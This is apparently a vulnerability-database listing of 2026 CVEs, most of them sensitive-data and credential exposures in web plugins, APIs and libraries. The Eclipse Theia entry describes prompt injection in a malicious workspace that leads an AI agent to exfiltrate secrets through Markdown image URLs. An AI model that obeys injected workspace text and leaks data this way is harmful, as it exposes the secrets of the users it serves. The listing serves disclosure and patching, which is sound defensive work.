| Severity | Description | ||||||
|---|---|---|---|---|---|---|---|
| CVE-2026-13211 | Medium | 4.3 v3 | - | - | -No fix available yet | 2026-07-01 | The genucenter web interface before version 8.0p11 unnecessarily exposes sensitive SNMP authentication and encryption keys in its HTTP responses to users with the “Service” or “Admin” role. |
| CVE-2026-12085 | Medium | 6.5 v3 | - | - | -No fix available yet | 2026-06-30 | IBM UCD - IBM UrbanCode Deploy 7.3 through 7.3.2.18 and IBM UCD - IBM DevOps Deploy 8.0 through 8.0.1.13, 8.1 through 8.1.2.6, and 8.2 through 8.2.1.0 IBM DevOps Deploy could disclose sensitive configurations and secrets to authenticated users in API responses that could be used in further attacks against the system. |
| CVE-2026-13437 | Medium | 6.5 v3 | 0.2% | - | -No fix available yet | 2026-06-29 | Insertion of sensitive information into sent data in the AI Agent job API in Devolutions PowerShell Universal 2026.2.0 allows an authenticated user with AI Agent read access to obtain reusable, potentially higher-privileged authentication tokens via App Tokens serialized in plaintext in job API responses. |
| CVE-2026-57318 | Medium | 6.5 v3 | 0.4% | - | -No fix available yet | 2026-06-26 | Subscriber Sensitive Data Exposure in Site Reviews <= 8.0.11 versions. |
| CVE-2026-54834 | High | 7.5 v3 | 0.3% | - | -No fix available yet | 2026-06-26 | Unauthenticated Sensitive Data Exposure in Object Cache 4 everyone <= 2.3.2 versions. |
| CVE-2026-55180 | Medium | 6.5 v3 | 0.2% | - | Fix available | 2026-06-25 | pnpm is a package manager. Prior to 10.34.2 and 11.5.3, pnpm and pacquet expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run. This vulnerability is fixed in 10.34.2 and 11.5.3. |
| CVE-2026-54848 | High | 8.3 v3 | 0.2% | - | -No fix available yet | 2026-06-25 | Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal APIExperts Square for WooCommerce allows Retrieve Embedded Sensitive Data. This issue affects APIExperts Square for WooCommerce: from n/a through 4.7.3. |
| CVE-2026-54841 | High | 7.5 v3 | 0.3% | - | -No fix available yet | 2026-06-25 | Unauthenticated Sensitive Data Exposure in Vitepos <= 3.4.2 versions. |
| CVE-2026-54821 | High | 7.4 v3 | 0.3% | - | -No fix available yet | 2026-06-25 | Subscriber Sensitive Data Exposure in Visual Link Preview <= 2.3.1 versions. |
| CVE-2026-22551 | Medium | 6.5 v3 | 0.2% | - | Fix available | 2026-06-18 | In Eclipse Theia versions prior to 1.71.0, the AI chat rendered Markdown image tags from AI responses, triggering HTTP requests to arbitrary external URLs without restriction. Combined with prompt injection in a malicious workspace, an attacker could induce the AI agent to construct image URLs encoding sensitive information from the workspace or conversation context, exfiltrating it to attacker-controlled servers. The workspace trust enforcement introduced in v1.71.0 mitigates the documented attack chain by disabling AI features in untrusted workspaces. |
| CVE-2026-52698 | High | 7.4 v3 | 0.2% | - | -No fix available yet | 2026-06-17 | Subscriber Sensitive Data Exposure in PushEngage – Web Push Notifications, eCommerce Automation & Chat Widget <= 4.2.3 versions. |
| CVE-2026-34888 | High | 7.5 v3 | 0.3% | - | -No fix available yet | 2026-06-17 | Unauthenticated Sensitive Data Exposure in Bricksforge <= 3.1.8.4 versions. |
| CVE-2026-27868 | Medium | 6.9 v4 | 0.4% | - | -No fix available yet | 2026-06-17 | An attacker with access via network to the Regesta Smart HD-PLC of the provider Teldat (in this case, NO registration action is required) who has the vulnerable software could obtain privilege information by using the command Version via the path: /upgrade/query.php?cmd=p+3&3Bversion resulting in a information disclosure. This issue affects Regesta Smart HD-PLC - TLDPH16D2: 11.02.05.10.02. |
| CVE-2024-35690 | Medium | 6.5 v3 | 0.3% | - | -No fix available yet | 2026-06-17 | Insertion of sensitive information into sent data vulnerability in MarketingFire Widget Options allows Retrieve Embedded Sensitive Data. This issue affects Widget Options: from n/a through 4.0.1. |
| CVE-2026-54197 | Medium | 6.5 v3 | 0.2% | - | -No fix available yet | 2026-06-16 | Unauthenticated Sensitive Data Exposure in GetGenie <= 4.4.1 versions. |
| CVE-2026-52695 | High | 7.5 v3 | 0.2% | - | -No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in ABC Crypto Checkout <= 1.8.2 versions. |
| CVE-2026-52692 | High | 7.5 v3 | 0.2% | - | -No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in Affiliates Manager <= 2.9.50 versions. |
| CVE-2026-49082 | High | 7.4 v3 | 0.3% | - | -No fix available yet | 2026-06-15 | Subscriber Sensitive Data Exposure in Chatway Live Chat – AI Chatbot, Customer Support, FAQ & Helpdesk Customer Service & Chat Buttons <= 1.4.8 versions. |
| CVE-2026-48965 | Medium | 6.5 v3 | 0.3% | - | -No fix available yet | 2026-06-15 | Subscriber Sensitive Data Exposure in XCloner <= 4.8.6 versions. |
| CVE-2026-42667 | High | 7.5 v3 | 0.3% | - | -No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in Bookly <= 27.4 versions. |
| CVE-2026-42384 | High | 7.5 v3 | 0.3% | - | -No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in Simply Schedule Appointments < 1.6.11.2 versions. |
| CVE-2026-40789 | High | 7.5 v3 | 0.3% | - | -No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in Amelia <= 2.2 versions. |
| CVE-2026-39480 | High | 7.5 v3 | 0.4% | - | -No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in Backup Migration <= 2.1.1 versions. |
| CVE-2026-49064 | High | 7.5 v3 | 0.2% | - | -No fix available yet | 2026-06-15 | Insertion of Sensitive Information Into Sent Data vulnerability in Stiofan GetPaid allows Retrieve Embedded Sensitive Data. This issue affects GetPaid: from n/a through 2.8.49. |
| CVE-2026-7184 | Medium | 6.5 v3 | 0.3% | - | Fix available | 2026-06-12 | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15 fail to sanitize the Remote Cluster API response on PATCH operations, which allows authenticated users with the {{manage_secure_connections}} permission to obtain remote cluster authentication tokens via a PATCH request to the remote cluster endpoint.. Mattermost Advisory ID: MMSA-2026-00662 |
| CVE-2026-44487 | High | 7.5 v3 | 0.7% | - | Fix available | 2026-06-11 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’s Node.js HTTP adapter may forward a Proxy-Authorization header to a redirected origin during specific proxy-to-direct redirect flows. This affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy. This vulnerability is fixed in 0.32.0 and 1.16.0. |
| CVE-2026-44486 | High | 7.5 v3 | 0.5% | - | Fix available | 2026-06-11 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target. This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected. This vulnerability is fixed in 0.32.0 and 1.16.0. |
| CVE-2026-46481 | High | 8.3 v3 | 0.2% | - | -No fix available yet | 2026-06-08 | OpenMetadata is a unified metadata platform. Prior to version 1.12.4, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both the cleartext database password in request.connection.config.password and the ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken. The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs with bot-level privileges. This issue has been patched in version 1.12.4. |
| CVE-2026-42539 | Medium | 6.5 v3 | 0.2% | - | -No fix available yet | 2026-06-04 | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 return sensitive data to the user which are not required for the client’s operation. Version 2.4.28 contains a patch. |
| CVE-2026-45739 | Low | 3.1 v3 | 0.2% | - | Fix available | 2026-06-04 | Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.288.4 through 0.315.3, Strawberry's bundled GraphiQL template wrote values from the GraphiQL headers editor into the browser URL query string. If a user entered a sensitive header, such as `Authorization: Bearer <token>`, the value could become visible in browser history, copied links, and server/proxy/CDN access logs after a page reload or shared request. Version 0.315.4 patches the issue. |
| CVE-2026-4035 | High | 7.7 v3 | 0.4% | - | Fix available | 2026-06-03 | A vulnerability in mlflow/mlflow versions prior to 3.11.0 allows for the resolution of environment variables in AI Gateway secrets, which can be exploited to exfiltrate sensitive server-side environment credentials to an attacker-controlled endpoint. This issue arises because the `api_key` field in gateway secrets can accept `$ENV_VAR` references, which are resolved against the MLflow server's environment during runtime. The resolved secrets are then sent in provider authentication headers to the configured upstream `api_base`. This vulnerability can be exploited by low-privileged authenticated users in basic-auth deployments or by unauthenticated users in default deployments without `basic-auth`. The impact includes potential leakage of sensitive credentials such as cloud artifact credent |
| CVE-2026-44653 | Medium | 6.5 v3 | 0.3% | - | Fix available | 2026-06-02 | LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.8.3, users with only `VIEW` access to an MCP server can retrieve the server's decrypted admin-managed secrets through `GET /api/mcp/servers` and `GET /api/mcp/servers/:serverName`. The returned config includes plaintext values for `apiKey.key` and `oauth.client_secret`. This allows viewers of a shared MCP server to exfiltrate the underlying provider credentials. Version 0.8..4 contains a patch. Other remediations include: never returning decrypted admin-managed secrets to non-owners; redacting apiKey.key and oauth.client_secret from all API responses consider returning only boolean presence indicators for secrets, similar to the auth-values route pattern; and, if owners need to edi |
| CVE-2026-35447 | Medium | 5.3 v4 | 0.2% | - | -No fix available yet | 2026-06-02 | NamelessMC is website software for Minecraft servers. In version 2.2.4, the profile page (modules/Core/pages/profile.php) processes wall post submissions and replies before verifying whether the viewer is authorized to access the profile. This allows any user with the profile.post permission to write wall posts to private or blocking profiles. Additionally, the reply branch does not verify that the target wall post belongs to the current profile, enabling attackers to inject replies into arbitrary wall posts owned by other profiles via a restricted profile URL. This is patched in version 2.2.5. |
| CVE-2026-42673 | High | 7.5 v3 | 0.2% | - | -No fix available yet | 2026-06-01 | Insertion of Sensitive Information Into Sent Data vulnerability in Logtivity Activity Logs Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity allows Retrieve Embedded Sensitive Data. This issue affects Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity: from n/a through 3.3.6. |
| CVE-2026-49370 | Low | 3.4 v3 | 0.2% | - | Fix available | 2026-05-29 | In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on fetchApp requests |
| CVE-2026-10101 | Medium | 6.3 v3 | 0.2% | - | -No fix available yet | 2026-05-29 | ACM/MCE assisted-service writes raw referenced pull-secret contents into `InfraEnv.status.conditions[].message` when pull-secret validation fails. A namespace principal with the stock `view` ClusterRole cannot directly read Secrets, but can read `InfraEnv` objects and recover the referenced Secret's `.dockerconfigjson` data from status. This bypasses the Kubernetes/OpenShift RBAC separation between read-only namespace viewers and Secret readers. In the reproduced proof, the same ServiceAccount was denied `get` and `list` on Secrets, but recovered synthetic pull-secret `username`, `password`, `email`, and base64 `auth` fields through `InfraEnv.status`. |
| CVE-2026-45582 | Medium | 6.5 v3 | 0.3% | - | Fix available | 2026-05-29 | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to 2.51.3, the workflow telemetry sanitizer could retain partial fragments of URL-shaped node parameters before sending workflow data to the project's anonymous telemetry backend. Values placed in HTTP-Request-style node parameters — such as customer or tenant identifiers, short secrets embedded in query strings, and signed request parameters — could therefore appear in stored telemetry, contrary to the collection boundary documented in PRIVACY.md. This vulnerability is fixed in 2.51.3. |
| CVE-2026-42746 | High | 7.3 v3 | 0.2% | - | -No fix available yet | 2026-05-27 | Insertion of Sensitive Information Into Sent Data vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Retrieve Embedded Sensitive Data.This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0. |
| CVE-2026-48877 | Medium | 6.5 v3 | 0.3% | - | -No fix available yet | 2026-05-27 | Insertion of Sensitive Information Into Sent Data vulnerability in Tom GenerateBlocks allows Retrieve Embedded Sensitive Data. This issue affects GenerateBlocks: from n/a through 2.1.0. |
| CVE-2026-41181 | Medium | 5.8 v3 | 0.4% | - | Fix available | 2026-05-15 | Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.44, 3.6.15, and 3.7.0-rc.3, there is an information disclosure vulnerability in Traefik's errors (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request's complete header set, including Authorization, Cookie, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that Host is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the errors middleware with a distinct error page service may inadvertently expose |
| CVE-2025-62309 | Low | 2.6 v3 | 0.1% | - | -No fix available yet | 2026-05-14 | HCL AION is affected by a vulnerability where auto-complete functionality is enabled for certain input fields. This may allow sensitive information to be stored in the browser, potentially leading to unintended exposure under specific conditions. |
| CVE-2025-62308 | Medium | 5.1 v3 | 0.1% | - | -No fix available yet | 2026-05-14 | HCL AION is affected by a vulnerability where sensitive backend infrastructure details may be exposed. Exposure of such information could reveal internal system architecture or configuration details, which may potentially assist in further analysis or targeted actions under certain conditions |
| CVE-2025-62305 | Medium | 5.1 v3 | 0.1% | - | -No fix available yet | 2026-05-14 | HCL AION is affected by a vulnerability where certain operations may trigger out-of-band interactions, potentially resulting in unintended disclosure of sensitive information. Such behaviour may allow exposure of data to external systems under specific conditions. |
| CVE-2026-45215 | Medium | 5.3 v3 | 0.2% | - | -No fix available yet | 2026-05-12 | Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal WP EasyPay wp-easy-pay allows Retrieve Embedded Sensitive Data.This issue affects WP EasyPay: from n/a through <= 4.3.0. |
| CVE-2026-42880 | Critical | 9.6 v3 | 0.5% | - | Fix available | 2026-05-07 | Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD's ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server's Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9. |
| CVE-2025-31978 | Medium | 4.6 v3 | 0.1% | - | -No fix available yet | 2026-05-06 | HCL BigFix Service Management (SM) does not adequately sanitize or safely render spreadsheet files (CSV, XLS, XLSX) before processing or distributing them. An attacker could populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content. |
| CVE-2026-42997 | High | 7.7 v3 | 0.4% | - | Fix available | 2026-05-05 | An issue was discovered in idrac in OpenStack Ironic before 35.0.1. During import, a user invoking molds can request authorization to be sent to a remote endpoint. The credential forwarded is a time-limited Keystone token (which provides access to all OpenStack services Ironic is authorized for); or basic credentials configured for molds storage. The fixed versions are 26.1.6, 29.0.5, 32.0.1, and 35.0.1. |
| CVE-2026-42379 | High | 7.7 v3 | 0.2% | - | -No fix available yet | 2026-04-27 | Insertion of Sensitive Information Into Sent Data vulnerability in WPDeveloper Templately allows Retrieve Embedded Sensitive Data.This issue affects Templately: from n/a through 3.6.1. |
| CVE-2026-42042 | Medium | 5.4 v3 | 0.2% | - | Fix available | 2026-04-24 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library's XSRF token protection logic uses JavaScript truthy/falsy semantics instead of strict boolean comparison for the withXSRFToken config property. When this property is set to any truthy non-boolean value (via prototype pollution or misconfiguration), the same-origin check (isURLSameOrigin) is short-circuited, causing XSRF tokens to be sent to all request targets including cross-origin servers controlled by an attacker. This vulnerability is fixed in 1.15.1 and 0.31.1. |
| CVE-2026-5512 | Medium | 4.3 v3 | 0.3% | - | Fix available | 2026-04-21 | An improper authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated attacker to determine the names of private repositories by their numeric ID. The mobile upload policy API endpoint did not perform an early authorization check, and validation error messages included the full repository name for repositories the caller did not have access to. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21 and was fixed in versions 3.20.1, 3.19.5, 3.18.8, 3.17.14, 3.16.17, 3.15.21, and 3.14.26. This vulnerability was reported via the GitHub Bug Bounty program. |
- MediumCVSS 4.3 v3·EPSS -·No fix yet
The genucenter web interface before version 8.0p11 unnecessarily exposes sensitive SNMP authentication and encryption keys in its HTTP responses to users with the “Service” or “Admin” role.
Published 2026-07-01
- MediumCVSS 6.5 v3·EPSS -·No fix yet
IBM UCD - IBM UrbanCode Deploy 7.3 through 7.3.2.18 and IBM UCD - IBM DevOps Deploy 8.0 through 8.0.1.13, 8.1 through 8.1.2.6, and 8.2 through 8.2.1.0 IBM DevOps Deploy could disclose sensitive configurations and secrets to authenticated users in API responses that could be used in further attacks against the system.
Published 2026-06-30
- MediumCVSS 6.5 v3·EPSS 0.2%·No fix yet
Insertion of sensitive information into sent data in the AI Agent job API in Devolutions PowerShell Universal 2026.2.0 allows an authenticated user with AI Agent read access to obtain reusable, potentially higher-privileged authentication tokens via App Tokens serialized in plaintext in job API responses.
Published 2026-06-29
- MediumCVSS 6.5 v3·EPSS 0.4%·No fix yet
Subscriber Sensitive Data Exposure in Site Reviews <= 8.0.11 versions.
Published 2026-06-26
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Object Cache 4 everyone <= 2.3.2 versions.
Published 2026-06-26
- MediumCVSS 6.5 v3·EPSS 0.2%·Fix available
pnpm is a package manager. Prior to 10.34.2 and 11.5.3, pnpm and pacquet expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run. This vulnerability is fixed in 10.34.2 and 11.5.3.
Published 2026-06-25
- HighCVSS 8.3 v3·EPSS 0.2%·No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal APIExperts Square for WooCommerce allows Retrieve Embedded Sensitive Data. This issue affects APIExperts Square for WooCommerce: from n/a through 4.7.3.
Published 2026-06-25
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Vitepos <= 3.4.2 versions.
Published 2026-06-25
- HighCVSS 7.4 v3·EPSS 0.3%·No fix yet
Subscriber Sensitive Data Exposure in Visual Link Preview <= 2.3.1 versions.
Published 2026-06-25
- MediumCVSS 6.5 v3·EPSS 0.2%·Fix available
In Eclipse Theia versions prior to 1.71.0, the AI chat rendered Markdown image tags from AI responses, triggering HTTP requests to arbitrary external URLs without restriction. Combined with prompt injection in a malicious workspace, an attacker could induce the AI agent to construct image URLs encoding sensitive information from the workspace or conversation context, exfiltrating it to attacker-controlled servers. The workspace trust enforcement introduced in v1.71.0 mitigates the documented attack chain by disabling AI features in untrusted workspaces.
Published 2026-06-18
- HighCVSS 7.4 v3·EPSS 0.2%·No fix yet
Subscriber Sensitive Data Exposure in PushEngage – Web Push Notifications, eCommerce Automation & Chat Widget <= 4.2.3 versions.
Published 2026-06-17
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Bricksforge <= 3.1.8.4 versions.
Published 2026-06-17
- MediumCVSS 6.9 v4·EPSS 0.4%·No fix yet
An attacker with access via network to the Regesta Smart HD-PLC of the provider Teldat (in this case, NO registration action is required) who has the vulnerable software could obtain privilege information by using the command Version via the path: /upgrade/query.php?cmd=p+3&3Bversion resulting in a information disclosure. This issue affects Regesta Smart HD-PLC - TLDPH16D2: 11.02.05.10.02.
Published 2026-06-17
- MediumCVSS 6.5 v3·EPSS 0.3%·No fix yet
Insertion of sensitive information into sent data vulnerability in MarketingFire Widget Options allows Retrieve Embedded Sensitive Data. This issue affects Widget Options: from n/a through 4.0.1.
Published 2026-06-17
- MediumCVSS 6.5 v3·EPSS 0.2%·No fix yet
Unauthenticated Sensitive Data Exposure in GetGenie <= 4.4.1 versions.
Published 2026-06-16
- HighCVSS 7.5 v3·EPSS 0.2%·No fix yet
Unauthenticated Sensitive Data Exposure in ABC Crypto Checkout <= 1.8.2 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.2%·No fix yet
Unauthenticated Sensitive Data Exposure in Affiliates Manager <= 2.9.50 versions.
Published 2026-06-15
- HighCVSS 7.4 v3·EPSS 0.3%·No fix yet
Subscriber Sensitive Data Exposure in Chatway Live Chat – AI Chatbot, Customer Support, FAQ & Helpdesk Customer Service & Chat Buttons <= 1.4.8 versions.
Published 2026-06-15
- MediumCVSS 6.5 v3·EPSS 0.3%·No fix yet
Subscriber Sensitive Data Exposure in XCloner <= 4.8.6 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Bookly <= 27.4 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Simply Schedule Appointments < 1.6.11.2 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Amelia <= 2.2 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.4%·No fix yet
Unauthenticated Sensitive Data Exposure in Backup Migration <= 2.1.1 versions.
Published 2026-06-15
- HighCVSS 7.5 v3·EPSS 0.2%·No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in Stiofan GetPaid allows Retrieve Embedded Sensitive Data. This issue affects GetPaid: from n/a through 2.8.49.
Published 2026-06-15
- MediumCVSS 6.5 v3·EPSS 0.3%·Fix available
Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15 fail to sanitize the Remote Cluster API response on PATCH operations, which allows authenticated users with the {{manage_secure_connections}} permission to obtain remote cluster authentication tokens via a PATCH request to the remote cluster endpoint.. Mattermost Advisory ID: MMSA-2026-00662
Published 2026-06-12
- HighCVSS 7.5 v3·EPSS 0.7%·Fix available
Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’s Node.js HTTP adapter may forward a Proxy-Authorization header to a redirected origin during specific proxy-to-direct redirect flows. This affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy. This vulnerability is fixed in 0.32.0 and 1.16.0.
Published 2026-06-11
- HighCVSS 7.5 v3·EPSS 0.5%·Fix available
Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target. This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected. This vulnerability is fixed in 0.32.0 and 1.16.0.
Published 2026-06-11
- HighCVSS 8.3 v3·EPSS 0.2%·No fix yet
OpenMetadata is a unified metadata platform. Prior to version 1.12.4, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both the cleartext database password in request.connection.config.password and the ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken. The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs with bot-level privileges. This issue has been patched in version 1.12.4.
Published 2026-06-08
- MediumCVSS 6.5 v3·EPSS 0.2%·No fix yet
IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 return sensitive data to the user which are not required for the client’s operation. Version 2.4.28 contains a patch.
Published 2026-06-04
- CVSS 3.1 v3·EPSS 0.2%·Fix available
Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.288.4 through 0.315.3, Strawberry's bundled GraphiQL template wrote values from the GraphiQL headers editor into the browser URL query string. If a user entered a sensitive header, such as `Authorization: Bearer <token>`, the value could become visible in browser history, copied links, and server/proxy/CDN access logs after a page reload or shared request. Version 0.315.4 patches the issue.
Published 2026-06-04
- HighCVSS 7.7 v3·EPSS 0.4%·Fix available
A vulnerability in mlflow/mlflow versions prior to 3.11.0 allows for the resolution of environment variables in AI Gateway secrets, which can be exploited to exfiltrate sensitive server-side environment credentials to an attacker-controlled endpoint. This issue arises because the `api_key` field in gateway secrets can accept `$ENV_VAR` references, which are resolved against the MLflow server's environment during runtime. The resolved secrets are then sent in provider authentication headers to the configured upstream `api_base`. This vulnerability can be exploited by low-privileged authenticated users in basic-auth deployments or by unauthenticated users in default deployments without `basic-auth`. The impact includes potential leakage of sensitive credentials such as cloud artifact credent
Published 2026-06-03
- MediumCVSS 6.5 v3·EPSS 0.3%·Fix available
LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.8.3, users with only `VIEW` access to an MCP server can retrieve the server's decrypted admin-managed secrets through `GET /api/mcp/servers` and `GET /api/mcp/servers/:serverName`. The returned config includes plaintext values for `apiKey.key` and `oauth.client_secret`. This allows viewers of a shared MCP server to exfiltrate the underlying provider credentials. Version 0.8..4 contains a patch. Other remediations include: never returning decrypted admin-managed secrets to non-owners; redacting apiKey.key and oauth.client_secret from all API responses consider returning only boolean presence indicators for secrets, similar to the auth-values route pattern; and, if owners need to edi
Published 2026-06-02
- MediumCVSS 5.3 v4·EPSS 0.2%·No fix yet
NamelessMC is website software for Minecraft servers. In version 2.2.4, the profile page (modules/Core/pages/profile.php) processes wall post submissions and replies before verifying whether the viewer is authorized to access the profile. This allows any user with the profile.post permission to write wall posts to private or blocking profiles. Additionally, the reply branch does not verify that the target wall post belongs to the current profile, enabling attackers to inject replies into arbitrary wall posts owned by other profiles via a restricted profile URL. This is patched in version 2.2.5.
Published 2026-06-02
- HighCVSS 7.5 v3·EPSS 0.2%·No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in Logtivity Activity Logs Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity allows Retrieve Embedded Sensitive Data. This issue affects Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity: from n/a through 3.3.6.
Published 2026-06-01
- CVSS 3.4 v3·EPSS 0.2%·Fix available
In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on fetchApp requests
Published 2026-05-29
- MediumCVSS 6.3 v3·EPSS 0.2%·No fix yet
ACM/MCE assisted-service writes raw referenced pull-secret contents into `InfraEnv.status.conditions[].message` when pull-secret validation fails. A namespace principal with the stock `view` ClusterRole cannot directly read Secrets, but can read `InfraEnv` objects and recover the referenced Secret's `.dockerconfigjson` data from status. This bypasses the Kubernetes/OpenShift RBAC separation between read-only namespace viewers and Secret readers. In the reproduced proof, the same ServiceAccount was denied `get` and `list` on Secrets, but recovered synthetic pull-secret `username`, `password`, `email`, and base64 `auth` fields through `InfraEnv.status`.
Published 2026-05-29
- MediumCVSS 6.5 v3·EPSS 0.3%·Fix available
n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to 2.51.3, the workflow telemetry sanitizer could retain partial fragments of URL-shaped node parameters before sending workflow data to the project's anonymous telemetry backend. Values placed in HTTP-Request-style node parameters — such as customer or tenant identifiers, short secrets embedded in query strings, and signed request parameters — could therefore appear in stored telemetry, contrary to the collection boundary documented in PRIVACY.md. This vulnerability is fixed in 2.51.3.
Published 2026-05-29
- HighCVSS 7.3 v3·EPSS 0.2%·No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Retrieve Embedded Sensitive Data.This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0.
Published 2026-05-27
- MediumCVSS 6.5 v3·EPSS 0.3%·No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in Tom GenerateBlocks allows Retrieve Embedded Sensitive Data. This issue affects GenerateBlocks: from n/a through 2.1.0.
Published 2026-05-27
- MediumCVSS 5.8 v3·EPSS 0.4%·Fix available
Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.44, 3.6.15, and 3.7.0-rc.3, there is an information disclosure vulnerability in Traefik's errors (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request's complete header set, including Authorization, Cookie, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that Host is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the errors middleware with a distinct error page service may inadvertently expose
Published 2026-05-15
- CVSS 2.6 v3·EPSS 0.1%·No fix yet
HCL AION is affected by a vulnerability where auto-complete functionality is enabled for certain input fields. This may allow sensitive information to be stored in the browser, potentially leading to unintended exposure under specific conditions.
Published 2026-05-14
- MediumCVSS 5.1 v3·EPSS 0.1%·No fix yet
HCL AION is affected by a vulnerability where sensitive backend infrastructure details may be exposed. Exposure of such information could reveal internal system architecture or configuration details, which may potentially assist in further analysis or targeted actions under certain conditions
Published 2026-05-14
- MediumCVSS 5.1 v3·EPSS 0.1%·No fix yet
HCL AION is affected by a vulnerability where certain operations may trigger out-of-band interactions, potentially resulting in unintended disclosure of sensitive information. Such behaviour may allow exposure of data to external systems under specific conditions.
Published 2026-05-14
- MediumCVSS 5.3 v3·EPSS 0.2%·No fix yet
